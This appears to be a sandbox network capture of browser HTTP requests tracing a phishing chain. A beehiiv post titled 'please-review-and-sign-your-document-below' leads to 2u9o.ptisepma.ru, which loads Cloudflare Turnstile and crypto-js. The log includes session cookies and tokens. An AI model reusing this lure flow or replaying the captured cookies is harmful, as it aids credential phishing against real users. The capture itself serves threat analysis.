Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/recommended_posts-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/assets/components-Oj2xMfGE.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /assets/visit_token-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/assets/components-Oj2xMfGE.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /assets/post_insights-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /visit_token?_data=routes%2F__actions%2Fvisit_token HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/9027d88b8fd31902 HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/embed.js HTTP/1.1Host: embed.bsky.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBCORS=tZpiXPNMEbiZBwEGgmnqy9X2AWkFyi5XRIeLe/I6T5+nNhvJ9Ed6K0R7O2EJJ7UMQ7B7nUB+kcrseYpKkwaOyvJObPOpjubodxRmOoS5qzADJiv2POkEckzX8w5U
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/recommended_posts-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /p/please-review-and-sign-your-document-below?_data=root HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonbaggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-transaction=routes%2Fp%2F%24slug,sentry-sampled=falsesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sentry-trace: 695ffbb837464cf4a120b62a556def38-91ca50fd2773eb74-0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a; cf_clearance=ql5CRHI1dk0_Fib5IAmfJB1.VIDitDmGjTQSg0dZQf4-1736964881-1.2.1.1-dES89_ScgNU6PSS_5opDjwHo8Fc8IuOFcEsGuAfeTezYehaspD9LYdzeoWZL9Osmgb_UDFLO9vPmvofouc_xsEFIlUoAZUrZDrDi6r1PO54IEYI5clcg4xayk5SKYZeRvtni12NgnTyWBnYklrRD7Yz742ODkb4K4u4n7d9F0TvtaMuue0GhyxODxglWs9WzFQXbr5ZNMjpMHQOiR6NJIwPcITwx_IiBlvXzjEinBFwoEvhuekRYLhNqRZ_AfXSaXqaZS90zkr.7nNPZvaCLnk4oqlADo1GoFkYz_5CS0EQ
Source: global trafficHTTP traffic detected: GET /p/please-review-and-sign-your-document-below?_data=routes%2Fp%2F%24slug HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonbaggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-transaction=routes%2Fp%2F%24slug,sentry-sampled=falsesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sentry-trace: 695ffbb837464cf4a120b62a556def38-91ca50fd2773eb74-0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a; cf_clearance=ql5CRHI1dk0_Fib5IAmfJB1.VIDitDmGjTQSg0dZQf4-1736964881-1.2.1.1-dES89_ScgNU6PSS_5opDjwHo8Fc8IuOFcEsGuAfeTezYehaspD9LYdzeoWZL9Osmgb_UDFLO9vPmvofouc_xsEFIlUoAZUrZDrDi6r1PO54IEYI5clcg4xayk5SKYZeRvtni12NgnTyWBnYklrRD7Yz742ODkb4K4u4n7d9F0TvtaMuue0GhyxODxglWs9WzFQXbr5ZNMjpMHQOiR6NJIwPcITwx_IiBlvXzjEinBFwoEvhuekRYLhNqRZ_AfXSaXqaZS90zkr.7nNPZvaCLnk4oqlADo1GoFkYz_5CS0EQ
Source: global trafficHTTP traffic detected: GET /assets/visit_token-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /post_insights?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Fpost_insights HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonbaggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-transaction=routes%2Fp%2F%24slug,sentry-sampled=falsesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sentry-trace: 695ffbb837464cf4a120b62a556def38-91ca50fd2773eb74-0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a; cf_clearance=ql5CRHI1dk0_Fib5IAmfJB1.VIDitDmGjTQSg0dZQf4-1736964881-1.2.1.1-dES89_ScgNU6PSS_5opDjwHo8Fc8IuOFcEsGuAfeTezYehaspD9LYdzeoWZL9Osmgb_UDFLO9vPmvofouc_xsEFIlUoAZUrZDrDi6r1PO54IEYI5clcg4xayk5SKYZeRvtni12NgnTyWBnYklrRD7Yz742ODkb4K4u4n7d9F0TvtaMuue0GhyxODxglWs9WzFQXbr5ZNMjpMHQOiR6NJIwPcITwx_IiBlvXzjEinBFwoEvhuekRYLhNqRZ_AfXSaXqaZS90zkr.7nNPZvaCLnk4oqlADo1GoFkYz_5CS0EQ
Source: global trafficHTTP traffic detected: GET /recommended_posts?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Frecommended_posts HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonbaggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-transaction=routes%2Fp%2F%24slug,sentry-sampled=falsesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sentry-trace: 695ffbb837464cf4a120b62a556def38-91ca50fd2773eb74-0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a; cf_clearance=ql5CRHI1dk0_Fib5IAmfJB1.VIDitDmGjTQSg0dZQf4-1736964881-1.2.1.1-dES89_ScgNU6PSS_5opDjwHo8Fc8IuOFcEsGuAfeTezYehaspD9LYdzeoWZL9Osmgb_UDFLO9vPmvofouc_xsEFIlUoAZUrZDrDi6r1PO54IEYI5clcg4xayk5SKYZeRvtni12NgnTyWBnYklrRD7Yz742ODkb4K4u4n7d9F0TvtaMuue0GhyxODxglWs9WzFQXbr5ZNMjpMHQOiR6NJIwPcITwx_IiBlvXzjEinBFwoEvhuekRYLhNqRZ_AfXSaXqaZS90zkr.7nNPZvaCLnk4oqlADo1GoFkYz_5CS0EQ
Source: global trafficHTTP traffic detected: GET /ns?c=96b30ca0-d36c-11ef-9184-6f26b2b3f904 HTTP/1.1Host: stk.px-cloud.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kanes-newsletter-871ead.beehiiv.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/lmms8/0x4AAAAAAA3QRJEAC_qJbwdC/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9027d8d7696df5f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/lmms8/0x4AAAAAAA3QRJEAC_qJbwdC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/lmms8/0x4AAAAAAA3QRJEAC_qJbwdC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2u9o.ptisepma.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJ0MHVuTFNuVjhMVGJMS3YwWUc4OGc9PSIsInZhbHVlIjoiandaU2pUbHVXWmxIM1hLMmQ0VE9uc01YSjJyYUUzN3VkWEhnWStZNUx5ZUlBUUtNUzBvUFduQkRFOGluRjBpdnkrQnBKdTU2ZzVPTmZrV0g3a1pnK0E1SFU4WVk5MHI3NkNTclBqbDAyd2xmck0zWTNTUktsVjQ2eUxtdDRITEsiLCJtYWMiOiIwMjVhYzQxMjhiZWZjYzlmZTY1NDI0ZTdjZTZiYjdlMWI3ZjlmYzBkMDY4Zjk4M2VmNDY4YmIxMGVkMmFhZGNkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ing0YTNObThubkc2Nno3dTlBcFV6RkE9PSIsInZhbHVlIjoiZytpd1VpTVVOWWZoK0FNaDBnQVluUGM4Rmg0NU4yTW96ZDNJeHlzRFdSazl4WjNtdXZ3SElOeEloVU9rQkpIN0JqV3d6R0VVUzNURmhFNnY5NFgzc1JTOFFqNytvZkpDTGtlckF4cTIyUTlKb2JVMVJMdWh6SHIvVGxTYW9XQ2EiLCJtYWMiOiI1ZDgxM2EyMjlhNDIwYTU1ODcwYmZlYzBlZWViMmJlYjMyYzViMTE0YzJhYmI1ZjQ0YzdhMjhlZjJhMGU2NTdmIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9027d8d7696df5f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/651714567:1736962315:3lPN5B_pdHyxu2zN0eNDhYTO4gAiA0k4emvGs5JWIt0/9027d8d7696df5f4/hVY0JGVqC6z_tWMP0OUg_f14hKuDGfg7JBy.BAGNURA-1736964883-1.1.1.1-p2rxPHVRoB.C67YhDTwg_FfpACb1dt5fHlRIgIbMTQFI.0B846ool8wnKkZVvXG8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9027d8d7696df5f4/1736964884737/a7a8088edc32fe386ff2e4ee17a0c5c34ef89749f0f9cdd871a41f5a7338b21f/95ZySpz0PrH8eb5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/lmms8/0x4AAAAAAA3QRJEAC_qJbwdC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
